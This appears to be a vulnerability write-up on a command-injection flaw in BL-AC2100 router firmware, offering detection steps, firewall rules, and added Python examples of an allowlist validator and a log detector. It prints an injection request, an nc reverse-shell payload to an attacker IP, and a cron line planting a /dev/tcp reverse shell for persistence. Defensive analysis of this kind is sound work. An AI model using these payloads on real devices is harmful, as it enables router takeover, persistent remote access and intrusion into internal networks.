How the CVE Works:
CVE-2025-29062 is a critical remote code execution (RCE) vulnerability in BL-AC2100 routers (firmware <=V1.0.4). The flaw resides in the `set_LimitClient_cfg` function of the embedded GoAhead web server, where improper input validation of the `time1` and `time2` parameters allows an attacker to inject commands. The web server processes these parameters unsafely, leading to arbitrary command execution with root privileges. Attackers can exploit this over the network without authentication, compromising the router and pivoting to internal networks.
DailyCVE Form:
Platform: BL-AC2100
Version: <=V1.0.4
Vulnerability: RCE
Severity: Critical
Date: 04/29/2025
What Undercode Says:
Exploitation:
1. Craft malicious HTTP POST request:
curl -X POST -d "time1=$(cmd)&time2=$(payload)" http://<target>/goform/set_LimitClient_cfg
2. Reverse shell payload example:
time1=1&time2=;nc -e /bin/sh <attacker_ip> 4444;
Detection & Mitigation:
1. Check firmware version (every version up to and including V1.0.4 is affected; the grep below matches only 1.0.4 exactly, so inspect the full version string):
cat /etc/version | grep "1.0.4"
2. Block unauthorized access (note: this rule drops all HTTP to the router, LAN administration included; add `-i <wan_interface>` to restrict it to the WAN side):
iptables -A INPUT -p tcp --dport 80 -j DROP
Patch Analysis:
- Vendor patch enforces input sanitization:
if (strstr(time1, ";") || strstr(time2, ";")) { exit(1); }
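The check above is a denylist on a single character. The example below, added here and not the vendor's code, contrasts that logic with an allowlist validator of the kind a firmware developer would want for a time-window parameter. It assumes `time1`/`time2` are HH:MM time-of-day strings; the real parameter format is not documented on the page, so the pattern is an assumption to adjust.

```python
import re

# Assumed parameter shape: 24-hour "HH:MM". Replace with the firmware's real
# format; the point is that only the expected shape is accepted.
TIME_PARAM = re.compile(r"^([01]\d|2[0-3]):[0-5]\d$")


def vendor_style_check(value: str) -> bool:
    """Mirror of the patch logic quoted on the page: reject only if ';' is present."""
    return ";" not in value


def allowlist_check(value: str) -> bool:
    """Accept a value only if it matches the expected time format exactly."""
    return TIME_PARAM.fullmatch(value) is not None


def validate_limit_client_cfg(params: dict) -> tuple:
    """Validate the time1/time2 fields of a set_LimitClient_cfg request.

    Returns (ok, names_of_rejected_parameters). A missing parameter is
    rejected as well, so the handler never falls through with an empty value.
    """
    rejected = [name for name in ("time1", "time2")
                if not allowlist_check(params.get(name, ""))]
    return (not rejected, rejected)


if __name__ == "__main__":
    # Constructed sample requests, not captured traffic.
    good = {"time1": "08:00", "time2": "18:00"}
    bad = {"time1": "08:00", "time2": "18:00;id"}
    print(validate_limit_client_cfg(good))  # (True, [])
    print(validate_limit_client_cfg(bad))   # (False, ['time2'])
```

Because the allowlist names what is acceptable rather than what is forbidden, it does not have to enumerate shell metacharacters, and the same value the page's own exploit uses (`$(cmd)`) is rejected for not being a time, not for containing a particular character.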
Post-Exploit Analysis:
1. Extract config files:
cat /etc/config/network
2. Persistence via cron:
echo " /bin/sh -i >& /dev/tcp/attacker/5555" >> /etc/crontabs/root
Defensive Measures:
1. Update firmware immediately.
2. Disable remote admin:
uci set uhttpd.main.listen_http=127.0.0.1; uci commit
3. Log monitoring for suspicious POST requests:
tail -f /var/log/uhttpd.log | grep "set_LimitClient_cfg"
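The grep above flags every call to the endpoint, legitimate configuration changes included. The script below, an added example rather than anything shipped with the device, narrows that to requests whose `time1`/`time2` values carry shell metacharacters. It assumes a log format of `<client_ip> <method> <path?query> <status>` in which the parameters are recorded; ordinary access logs do not record POST bodies, so in practice this logic would run on proxy, IDS or request-capture output. The sample lines are constructed.

```python
import re
from urllib.parse import unquote_plus

ENDPOINT = "/goform/set_LimitClient_cfg"

# Characters that have no place in a time value but are significant to /bin/sh.
SHELL_META = re.compile(r"[;|&`$(){}<>\n\\]")

# Assumed log line shape: "<client_ip> <method> <path?query> <status>".
LOG_RE = re.compile(r"^(?P<ip>\S+) (?P<method>[A-Z]+) (?P<target>\S+) (?P<status>\d{3})$")

# Constructed sample log lines (not real device output).
SAMPLE_LOG = """\
192.168.1.20 POST /goform/set_LimitClient_cfg?time1=08:00&time2=18:00 200
192.168.1.20 GET /goform/get_LimitClient_cfg 200
10.0.0.7 POST /goform/set_LimitClient_cfg?time1=1&time2=1%3Bid 200
"""


def parse_query(target: str) -> dict:
    """Split the query string on '&' only and URL-decode keys and values.

    Written by hand rather than with urllib.parse.parse_qs because older
    Python versions also treat ';' as a separator, which would hide exactly
    the character we want to see.
    """
    params = {}
    for pair in target.partition("?")[2].split("&"):
        if not pair:
            continue
        key, _, value = pair.partition("=")
        params[unquote_plus(key)] = unquote_plus(value)
    return params


def find_suspicious(lines) -> list:
    """Return POSTs to the vulnerable endpoint whose time fields contain shell metacharacters."""
    hits = []
    for raw in lines:
        line = raw.strip()
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["target"].partition("?")[0]
        if m["method"] != "POST" or path != ENDPOINT:
            continue
        params = parse_query(m["target"])
        flagged = [name for name in ("time1", "time2")
                   if SHELL_META.search(params.get(name, ""))]
        if flagged:
            hits.append({"ip": m["ip"], "params": flagged, "line": line})
    return hits


if __name__ == "__main__":
    for hit in find_suspicious(SAMPLE_LOG.splitlines()):
        print(f"ALERT {hit['ip']} injected into {hit['params']}: {hit['line']}")
```

The benign first line (plain HH:MM values) is not reported, so the alert stream stays usable; flagging on the decoded value also catches percent-encoded metacharacters that a literal grep for `;` would miss.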
Exploit Impact:
- Full device compromise.
- Lateral movement via LAN.
- DNS hijacking via `/etc/resolv.conf` modification.
References:
- MITRE CVE-2025-29062
- Vendor advisory: BL-AC2100 Firmware V1.0.5+ patches RCE.
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode